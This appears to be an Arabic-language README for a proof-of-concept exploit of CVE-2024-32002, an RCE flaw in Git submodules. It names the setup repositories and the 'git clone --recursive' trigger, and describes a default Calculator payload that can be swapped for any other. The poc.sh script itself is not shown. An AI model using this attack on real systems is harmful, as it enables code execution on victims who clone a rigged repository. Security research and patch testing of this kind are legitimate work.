
CVE-2024-32002 RCE PoC
يحتوي هذا المستودع على إثبات مفهوم (PoC) للثغرة CVE-2024-32002، وهي ثغرة تنفيذ برمجي عن بُعد (RCE) في الوحدات الفرعية لـ Git. يوضح الاستغلال كيف يمكن تشغيل حمولة خبيثة عبر استنساخ متكرر لمستودع Git.
قبل تشغيل الـ PoC، قم بإنشاء المستودعات التالية على خادم Git البعيد الخاص بك، أو لا تتردد في تغيير الأسماء حسب الحاجة:
hulk.gitsubmod.gitsmash.gitقم بتحديث مسارات المستودعات في سكربت الـ PoC وفقًا لذلك إذا قمت بتغيير الأسماء.
يستغل الثغرة الوحدات الفرعية في Git لتنفيذ حمولة على النظام المستهدف عند استنساخ المستودع بشكل متكرر. تم اختبار هذا الـ PoC على نظام macOS.
HULK_REPO="[email protected]:safebuffer/hulk.git"
pullme_REPO="[email protected]:safebuffer/submod.git"
# Final Exploit Repo
SMASH_REPO="[email protected]:safebuffer/smash.git"
لتشغيل الاستغلال، قم بتشغيل سكربت poc.sh ثم نفّذ الأمر التالي:
git clone --recursive $SMASH_REPO
الحمولة الافتراضية في هذا الـ PoC تفتح تطبيق الآلة الحاسبة على نظام macOS. يمكنك تغييرها إلى أي حمولة تختارها.
/System/Applications/Calculator.app/Contents/MacOS/Calculator
هذا الـ PoC مخصص للأغراض التعليمية فقط. استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها. قد يؤدي إساءة استخدام هذا الـ PoC إلى عواقب وخيمة.